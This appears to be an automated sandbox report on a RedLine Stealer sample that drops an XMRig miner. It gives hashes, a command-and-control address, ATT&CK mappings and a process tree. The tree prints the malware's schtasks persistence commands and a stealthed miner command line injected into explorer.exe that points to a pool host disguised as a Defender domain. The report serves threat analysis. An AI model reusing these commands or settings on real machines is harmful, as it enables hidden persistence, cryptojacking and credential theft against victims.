redline | 96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5

Analysis

max time kernel
155s
max time network
156s
platform
windows10_x64
resource
win10-en-20210920
submitted
28-10-2021 11:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exe
Size

841KB
MD5

bd27aa9df63cc83a10927cc1945c6c52
SHA1

8e5ee6bf51999c1ad2ee57a97deca83063938582
SHA256

96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5
SHA512

2ea36bc17c898f6abb2b5dac8a05997e26aea0b22af8e8aec1c2720fc18d39dcc5340b2096bc21311275fbf8cb3ba9dc7001c0062b6f04ddd410c50c2535e24d

Score

10^/10

redline xmrig mix2 discovery infostealer miner spyware stealer vmprotect

Malware Config

Extracted

Family

redline

Botnet

mix2

195.238.126.94:30418

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/352-115-0x0000000000630000-0x000000000065E000-memory.dmp	family_redline
behavioral1/memory/352-121-0x00000000009E0000-0x00000000009F9000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1756-233-0x000000014030F3F8-mapping.dmp	xmrig
behavioral1/memory/1756-236-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

healthservicerun.exedriverservicerun.exeHealthService.exeDisplayDriver.exesihost64.exesihost32.exe

pid process

1764 healthservicerun.exe
3056 driverservicerun.exe
696 HealthService.exe
2692 DisplayDriver.exe
2076 sihost64.exe
1488 sihost32.exe

pid	process
1764	healthservicerun.exe
3056	driverservicerun.exe
696	HealthService.exe
2692	DisplayDriver.exe
2076	sihost64.exe
1488	sihost32.exe

VMProtect packed file 12 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\healthservicerun.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\healthservicerun.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\driverservicerun.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\driverservicerun.exe	vmprotect
behavioral1/memory/1764-146-0x0000000000400000-0x0000000001087000-memory.dmp	vmprotect
behavioral1/memory/3056-149-0x0000000000400000-0x000000000102C000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Roaming\HealthService.exe	vmprotect
C:\Users\Admin\AppData\Roaming\HealthService.exe	vmprotect
behavioral1/memory/696-193-0x0000000000400000-0x0000000001087000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Roaming\DisplayDriver.exe	vmprotect
C:\Users\Admin\AppData\Roaming\DisplayDriver.exe	vmprotect
behavioral1/memory/2692-201-0x0000000000400000-0x000000000102C000-memory.dmp	vmprotect

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

healthservicerun.exedriverservicerun.exeHealthService.exeDisplayDriver.exe

pid process

1764 healthservicerun.exe
3056 driverservicerun.exe
696 HealthService.exe
2692 DisplayDriver.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 2616 set thread context of 1756 2616 conhost.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1352 schtasks.exe
2472 schtasks.exe

pid	process
1764	healthservicerun.exe
3056	driverservicerun.exe
696	HealthService.exe
2692	DisplayDriver.exe

description	pid	process	target process
PID 2616 set thread context of 1756	2616	conhost.exe	explorer.exe

pid	process
1352	schtasks.exe
2472	schtasks.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

Processes:

96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exehealthservicerun.exedriverservicerun.execonhost.execonhost.exeHealthService.exeDisplayDriver.execonhost.exeexplorer.execonhost.exe

pid	process
352	96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exe
1764	healthservicerun.exe
1764	healthservicerun.exe
3056	driverservicerun.exe
3056	driverservicerun.exe
3932	conhost.exe
3548	conhost.exe
696	HealthService.exe
696	HealthService.exe
2692	DisplayDriver.exe
2692	DisplayDriver.exe
2616	conhost.exe
2616	conhost.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
3500	conhost.exe
3500	conhost.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe
1756	explorer.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.execonhost.execonhost.execonhost.exeexplorer.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	352	96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exe
Token: SeDebugPrivilege	3932	conhost.exe
Token: SeDebugPrivilege	3548	conhost.exe
Token: SeDebugPrivilege	2616	conhost.exe
Token: SeLockMemoryPrivilege	1756	explorer.exe
Token: SeLockMemoryPrivilege	1756	explorer.exe
Token: SeDebugPrivilege	3500	conhost.exe

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exehealthservicerun.execonhost.execmd.exedriverservicerun.execonhost.execmd.execmd.execmd.exeHealthService.execonhost.exeDisplayDriver.execonhost.exesihost64.exe

description	pid	process	target process
PID 352 wrote to memory of 1764	352	96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exe	healthservicerun.exe
PID 352 wrote to memory of 1764	352	96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exe	healthservicerun.exe
PID 352 wrote to memory of 3056	352	96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exe	driverservicerun.exe
PID 352 wrote to memory of 3056	352	96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exe	driverservicerun.exe
PID 1764 wrote to memory of 3932	1764	healthservicerun.exe	conhost.exe
PID 1764 wrote to memory of 3932	1764	healthservicerun.exe	conhost.exe
PID 1764 wrote to memory of 3932	1764	healthservicerun.exe	conhost.exe
PID 3932 wrote to memory of 2664	3932	conhost.exe	cmd.exe
PID 3932 wrote to memory of 2664	3932	conhost.exe	cmd.exe
PID 2664 wrote to memory of 1352	2664	cmd.exe	schtasks.exe
PID 2664 wrote to memory of 1352	2664	cmd.exe	schtasks.exe
PID 3056 wrote to memory of 3548	3056	driverservicerun.exe	conhost.exe
PID 3056 wrote to memory of 3548	3056	driverservicerun.exe	conhost.exe
PID 3056 wrote to memory of 3548	3056	driverservicerun.exe	conhost.exe
PID 3548 wrote to memory of 3908	3548	conhost.exe	cmd.exe
PID 3548 wrote to memory of 3908	3548	conhost.exe	cmd.exe
PID 3908 wrote to memory of 2472	3908	cmd.exe	schtasks.exe
PID 3908 wrote to memory of 2472	3908	cmd.exe	schtasks.exe
PID 3932 wrote to memory of 3084	3932	conhost.exe	cmd.exe
PID 3932 wrote to memory of 3084	3932	conhost.exe	cmd.exe
PID 3084 wrote to memory of 696	3084	cmd.exe	HealthService.exe
PID 3084 wrote to memory of 696	3084	cmd.exe	HealthService.exe
PID 3548 wrote to memory of 1760	3548	conhost.exe	cmd.exe
PID 3548 wrote to memory of 1760	3548	conhost.exe	cmd.exe
PID 1760 wrote to memory of 2692	1760	cmd.exe	DisplayDriver.exe
PID 1760 wrote to memory of 2692	1760	cmd.exe	DisplayDriver.exe
PID 696 wrote to memory of 2616	696	HealthService.exe	conhost.exe
PID 696 wrote to memory of 2616	696	HealthService.exe	conhost.exe
PID 696 wrote to memory of 2616	696	HealthService.exe	conhost.exe
PID 2616 wrote to memory of 2076	2616	conhost.exe	sihost64.exe
PID 2616 wrote to memory of 2076	2616	conhost.exe	sihost64.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2616 wrote to memory of 1756	2616	conhost.exe	explorer.exe
PID 2692 wrote to memory of 3500	2692	DisplayDriver.exe	conhost.exe
PID 2692 wrote to memory of 3500	2692	DisplayDriver.exe	conhost.exe
PID 2692 wrote to memory of 3500	2692	DisplayDriver.exe	conhost.exe
PID 3500 wrote to memory of 1488	3500	conhost.exe	sihost32.exe
PID 3500 wrote to memory of 1488	3500	conhost.exe	sihost32.exe
PID 2076 wrote to memory of 2024	2076	sihost64.exe	conhost.exe
PID 2076 wrote to memory of 2024	2076	sihost64.exe	conhost.exe
PID 2076 wrote to memory of 2024	2076	sihost64.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exe
"C:\Users\Admin\AppData\Local\Temp\96ad89ff084cb88f1bd0bf8f104b744d9bf26157aa9f117851fdbfc2b20585c5.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:352

C:\Users\Admin\AppData\Local\Temp\healthservicerun.exe
"C:\Users\Admin\AppData\Local\Temp\healthservicerun.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\healthservicerun.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3932

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "HealthService" /tr "C:\Users\Admin\AppData\Roaming\HealthService.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2664

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "HealthService" /tr "C:\Users\Admin\AppData\Roaming\HealthService.exe"
5⤵
- Creates scheduled task(s)
PID:1352

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\HealthService.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3084

C:\Users\Admin\AppData\Roaming\HealthService.exe
C:\Users\Admin\AppData\Roaming\HealthService.exe
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:696

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\HealthService.exe"
6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
8⤵
PID:2024

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Users\Admin\AppData\Local\Temp\driverservicerun.exe
"C:\Users\Admin\AppData\Local\Temp\driverservicerun.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3056

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\driverservicerun.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3548

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "DisplayDriver" /tr "C:\Users\Admin\AppData\Roaming\DisplayDriver.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3908

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "DisplayDriver" /tr "C:\Users\Admin\AppData\Roaming\DisplayDriver.exe"
5⤵
- Creates scheduled task(s)
PID:2472

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\DisplayDriver.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Users\Admin\AppData\Roaming\DisplayDriver.exe
C:\Users\Admin\AppData\Roaming\DisplayDriver.exe
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\DisplayDriver.exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3500

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
7⤵
- Executes dropped EXE
PID:1488

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
C:\Users\Admin\AppData\Local\Temp\driverservicerun.exe
MD5
d13d12e18a8c985de2e273fcb2f14547

SHA1
8eb0ba973f5dfa6787adb89d1fe53678d474f2d4

SHA256
5eb207769b55346b025d3fefd9fffeda3eddf9c7df5be2cfe1efe4b4e381366c

SHA512
204c2416a95267621873f265a7dc1c2162f35f324418f6b53a63e5e09d7e95bb26afd546e40f977d1cbefb0261cec692d84b1a835677c6c15c87f501b42f13ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\driverservicerun.exe
MD5
d13d12e18a8c985de2e273fcb2f14547

SHA1
8eb0ba973f5dfa6787adb89d1fe53678d474f2d4

SHA256
5eb207769b55346b025d3fefd9fffeda3eddf9c7df5be2cfe1efe4b4e381366c

SHA512
204c2416a95267621873f265a7dc1c2162f35f324418f6b53a63e5e09d7e95bb26afd546e40f977d1cbefb0261cec692d84b1a835677c6c15c87f501b42f13ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\healthservicerun.exe
MD5
babf3f7b8f7b5f5d506df62b396ca190

SHA1
f92bae28705c2aa8ac48e488099645c85047ae27

SHA256
e806d2ac57f47ce18ab584b05c3dcec07616f2d772a4dc80672842723d22394e

SHA512
759947c9c487d5dc13b99318721cea98c2e93613a58cf9e37aed6caa0ba63a59416809235941a98ed31a7c5baa378909c1f021cb10426c8aa3a054bce6117921

Download Submit
C:\Users\Admin\AppData\Local\Temp\healthservicerun.exe
MD5
babf3f7b8f7b5f5d506df62b396ca190

SHA1
f92bae28705c2aa8ac48e488099645c85047ae27

SHA256
e806d2ac57f47ce18ab584b05c3dcec07616f2d772a4dc80672842723d22394e

SHA512
759947c9c487d5dc13b99318721cea98c2e93613a58cf9e37aed6caa0ba63a59416809235941a98ed31a7c5baa378909c1f021cb10426c8aa3a054bce6117921

Download Submit
C:\Users\Admin\AppData\Roaming\DisplayDriver.exe
MD5
d13d12e18a8c985de2e273fcb2f14547

SHA1
8eb0ba973f5dfa6787adb89d1fe53678d474f2d4

SHA256
5eb207769b55346b025d3fefd9fffeda3eddf9c7df5be2cfe1efe4b4e381366c

SHA512
204c2416a95267621873f265a7dc1c2162f35f324418f6b53a63e5e09d7e95bb26afd546e40f977d1cbefb0261cec692d84b1a835677c6c15c87f501b42f13ef

Download Submit
C:\Users\Admin\AppData\Roaming\DisplayDriver.exe
MD5
d13d12e18a8c985de2e273fcb2f14547

SHA1
8eb0ba973f5dfa6787adb89d1fe53678d474f2d4

SHA256
5eb207769b55346b025d3fefd9fffeda3eddf9c7df5be2cfe1efe4b4e381366c

SHA512
204c2416a95267621873f265a7dc1c2162f35f324418f6b53a63e5e09d7e95bb26afd546e40f977d1cbefb0261cec692d84b1a835677c6c15c87f501b42f13ef

Download Submit
C:\Users\Admin\AppData\Roaming\HealthService.exe
MD5
babf3f7b8f7b5f5d506df62b396ca190

SHA1
f92bae28705c2aa8ac48e488099645c85047ae27

SHA256
e806d2ac57f47ce18ab584b05c3dcec07616f2d772a4dc80672842723d22394e

SHA512
759947c9c487d5dc13b99318721cea98c2e93613a58cf9e37aed6caa0ba63a59416809235941a98ed31a7c5baa378909c1f021cb10426c8aa3a054bce6117921

Download Submit
C:\Users\Admin\AppData\Roaming\HealthService.exe
MD5
babf3f7b8f7b5f5d506df62b396ca190

SHA1
f92bae28705c2aa8ac48e488099645c85047ae27

SHA256
e806d2ac57f47ce18ab584b05c3dcec07616f2d772a4dc80672842723d22394e

SHA512
759947c9c487d5dc13b99318721cea98c2e93613a58cf9e37aed6caa0ba63a59416809235941a98ed31a7c5baa378909c1f021cb10426c8aa3a054bce6117921

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
a66ae12d22af58c3c73977ebf8a9e247

SHA1
57026de1c5b9d0b5b33c37373a6c82e367b6f8aa

SHA256
f17a2a5954d483a820dd595d028d54187a2864f0d2a7bc97d8546e71162e0f61

SHA512
e543b96aa92f70a347279c8deeef652f1db360d7ee383a3d18dd224fcc03208c394609432e562aa6cc595a2f502cf15ad7962eaaed496780b43a8852d032ae39

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
a66ae12d22af58c3c73977ebf8a9e247

SHA1
57026de1c5b9d0b5b33c37373a6c82e367b6f8aa

SHA256
f17a2a5954d483a820dd595d028d54187a2864f0d2a7bc97d8546e71162e0f61

SHA512
e543b96aa92f70a347279c8deeef652f1db360d7ee383a3d18dd224fcc03208c394609432e562aa6cc595a2f502cf15ad7962eaaed496780b43a8852d032ae39

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
b1a5ed419c511e7438fc511dc029c5d6

SHA1
677624e63d1e19f27a8ccf8bc2836901c1cbb130

SHA256
d6b2e64ae08c00fe0670b4074e4dab06a4d06799e8c70b413f71e23af5440f9c

SHA512
1afd6c27b68690a893e4edcbbfa7291ef611368a23c44d53cf2d39554f112f44991fe9112a89e3781c9ffbf8e4d260a060d75ba1fd037ed7fb4e6b500ad6be2a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
MD5
b1a5ed419c511e7438fc511dc029c5d6

SHA1
677624e63d1e19f27a8ccf8bc2836901c1cbb130

SHA256
d6b2e64ae08c00fe0670b4074e4dab06a4d06799e8c70b413f71e23af5440f9c

SHA512
1afd6c27b68690a893e4edcbbfa7291ef611368a23c44d53cf2d39554f112f44991fe9112a89e3781c9ffbf8e4d260a060d75ba1fd037ed7fb4e6b500ad6be2a

Download Submit
memory/352-133-0x0000000005CC0000-0x0000000005CC1000-memory.dmp

Filesize
4KB

Download
memory/352-130-0x0000000002BF4000-0x0000000002BF5000-memory.dmp

Filesize
4KB

Download
memory/352-136-0x00000000064B0000-0x00000000064B1000-memory.dmp

Filesize
4KB

Download
memory/352-137-0x0000000007170000-0x0000000007171000-memory.dmp

Filesize
4KB

Download
memory/352-138-0x0000000007340000-0x0000000007341000-memory.dmp

Filesize
4KB

Download
memory/352-139-0x00000000079B0000-0x00000000079B1000-memory.dmp

Filesize
4KB

Download
memory/352-121-0x00000000009E0000-0x00000000009F9000-memory.dmp

Filesize
100KB

Download
memory/352-134-0x0000000005D60000-0x0000000005D61000-memory.dmp

Filesize
4KB

Download
memory/352-123-0x0000000005400000-0x0000000005401000-memory.dmp

Filesize
4KB

Download
memory/352-124-0x0000000002B70000-0x0000000002B71000-memory.dmp

Filesize
4KB

Download
memory/352-132-0x0000000005C40000-0x0000000005C41000-memory.dmp

Filesize
4KB

Download
memory/352-131-0x0000000002C30000-0x0000000002C31000-memory.dmp

Filesize
4KB

Download
memory/352-125-0x0000000005A10000-0x0000000005A11000-memory.dmp

Filesize
4KB

Download
memory/352-126-0x0000000002BA0000-0x0000000002BA1000-memory.dmp

Filesize
4KB

Download
memory/352-115-0x0000000000630000-0x000000000065E000-memory.dmp

Filesize
184KB

Download
memory/352-127-0x0000000002BF0000-0x0000000002BF1000-memory.dmp

Filesize
4KB

Download
memory/352-128-0x0000000002BF2000-0x0000000002BF3000-memory.dmp

Filesize
4KB

Download
memory/352-129-0x0000000002BF3000-0x0000000002BF4000-memory.dmp

Filesize
4KB

Download
memory/352-135-0x0000000006450000-0x0000000006451000-memory.dmp

Filesize
4KB

Download
memory/696-190-0x0000000000000000-mapping.dmp

Download
memory/696-193-0x0000000000400000-0x0000000001087000-memory.dmp

Filesize
12.5MB

Download
memory/1352-169-0x0000000000000000-mapping.dmp

Download
memory/1488-265-0x0000000000000000-mapping.dmp

Download
memory/1756-236-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1756-233-0x000000014030F3F8-mapping.dmp

Download
memory/1756-271-0x0000000013E60000-0x0000000013E80000-memory.dmp

Filesize
128KB

Download
memory/1756-239-0x00000000029F0000-0x0000000002A10000-memory.dmp

Filesize
128KB

Download
memory/1756-270-0x0000000013E40000-0x0000000013E60000-memory.dmp

Filesize
128KB

Download
memory/1760-195-0x0000000000000000-mapping.dmp

Download
memory/1764-146-0x0000000000400000-0x0000000001087000-memory.dmp

Filesize
12.5MB

Download
memory/1764-148-0x00007FF977B80000-0x00007FF977B82000-memory.dmp

Filesize
8KB

Download
memory/1764-140-0x0000000000000000-mapping.dmp

Download
memory/2024-284-0x000001F156773000-0x000001F156775000-memory.dmp

Filesize
8KB

Download
memory/2024-285-0x000001F156776000-0x000001F156777000-memory.dmp

Filesize
4KB

Download
memory/2024-282-0x000001F156770000-0x000001F156772000-memory.dmp

Filesize
8KB

Download
memory/2024-275-0x000001F13C350000-0x000001F13C362000-memory.dmp

Filesize
72KB

Download
memory/2076-228-0x0000000000000000-mapping.dmp

Download
memory/2472-187-0x0000000000000000-mapping.dmp

Download
memory/2616-205-0x000001BE73770000-0x000001BE73772000-memory.dmp

Filesize
8KB

Download
memory/2616-214-0x000001BE73770000-0x000001BE73772000-memory.dmp

Filesize
8KB

Download
memory/2616-206-0x000001BE73770000-0x000001BE73772000-memory.dmp

Filesize
8KB

Download
memory/2616-209-0x000001BE73770000-0x000001BE73772000-memory.dmp

Filesize
8KB

Download
memory/2616-210-0x000001BE75B70000-0x000001BE75B72000-memory.dmp

Filesize
8KB

Download
memory/2616-211-0x000001BE75B73000-0x000001BE75B75000-memory.dmp

Filesize
8KB

Download
memory/2616-212-0x000001BE75B76000-0x000001BE75B77000-memory.dmp

Filesize
4KB

Download
memory/2616-204-0x000001BE73770000-0x000001BE73772000-memory.dmp

Filesize
8KB

Download
memory/2616-217-0x000001BE73770000-0x000001BE73772000-memory.dmp

Filesize
8KB

Download
memory/2616-203-0x000001BE73770000-0x000001BE73772000-memory.dmp

Filesize
8KB

Download
memory/2664-168-0x0000000000000000-mapping.dmp

Download
memory/2692-201-0x0000000000400000-0x000000000102C000-memory.dmp

Filesize
12.2MB

Download
memory/2692-198-0x0000000000000000-mapping.dmp

Download
memory/3056-151-0x00007FF977B80000-0x00007FF977B82000-memory.dmp

Filesize
8KB

Download
memory/3056-149-0x0000000000400000-0x000000000102C000-memory.dmp

Filesize
12.2MB

Download
memory/3056-143-0x0000000000000000-mapping.dmp

Download
memory/3084-188-0x0000000000000000-mapping.dmp

Download
memory/3500-248-0x000001C7E1773000-0x000001C7E1775000-memory.dmp

Filesize
8KB

Download
memory/3500-247-0x000001C7E1770000-0x000001C7E1772000-memory.dmp

Filesize
8KB

Download
memory/3500-249-0x000001C7E1776000-0x000001C7E1777000-memory.dmp

Filesize
4KB

Download
memory/3548-173-0x00000204B7890000-0x00000204B7892000-memory.dmp

Filesize
8KB

Download
memory/3548-179-0x00000204D1D33000-0x00000204D1D35000-memory.dmp

Filesize
8KB

Download
memory/3548-170-0x00000204B7890000-0x00000204B7892000-memory.dmp

Filesize
8KB

Download
memory/3548-197-0x00000204B7890000-0x00000204B7892000-memory.dmp

Filesize
8KB

Download
memory/3548-177-0x00000204B7410000-0x00000204B7622000-memory.dmp

Filesize
2.1MB

Download
memory/3548-171-0x00000204B7890000-0x00000204B7892000-memory.dmp

Filesize
8KB

Download
memory/3548-172-0x00000204B7890000-0x00000204B7892000-memory.dmp

Filesize
8KB

Download
memory/3548-185-0x00000204B7890000-0x00000204B7892000-memory.dmp

Filesize
8KB

Download
memory/3548-174-0x00000204D1F60000-0x00000204D216E000-memory.dmp

Filesize
2.1MB

Download
memory/3548-176-0x00000204B7890000-0x00000204B7892000-memory.dmp

Filesize
8KB

Download
memory/3548-180-0x00000204D1D36000-0x00000204D1D37000-memory.dmp

Filesize
4KB

Download
memory/3548-178-0x00000204D1D30000-0x00000204D1D32000-memory.dmp

Filesize
8KB

Download
memory/3548-181-0x00000204D1D40000-0x00000204D1F36000-memory.dmp

Filesize
2.0MB

Download
memory/3548-182-0x00000204B7890000-0x00000204B7892000-memory.dmp

Filesize
8KB

Download
memory/3908-186-0x0000000000000000-mapping.dmp

Download
memory/3932-160-0x000002016F010000-0x000002016F012000-memory.dmp

Filesize
8KB

Download
memory/3932-156-0x000002016FA50000-0x000002016FC8D000-memory.dmp

Filesize
2.2MB

Download
memory/3932-159-0x000002016CF70000-0x000002016D1B1000-memory.dmp

Filesize
2.3MB

Download
memory/3932-167-0x000002016D430000-0x000002016D432000-memory.dmp

Filesize
8KB

Download
memory/3932-162-0x000002016F016000-0x000002016F017000-memory.dmp

Filesize
4KB

Download
memory/3932-163-0x000002016F810000-0x000002016FA35000-memory.dmp

Filesize
2.1MB

Download
memory/3932-158-0x000002016D430000-0x000002016D432000-memory.dmp

Filesize
8KB

Download
memory/3932-161-0x000002016F013000-0x000002016F015000-memory.dmp

Filesize
8KB

Download
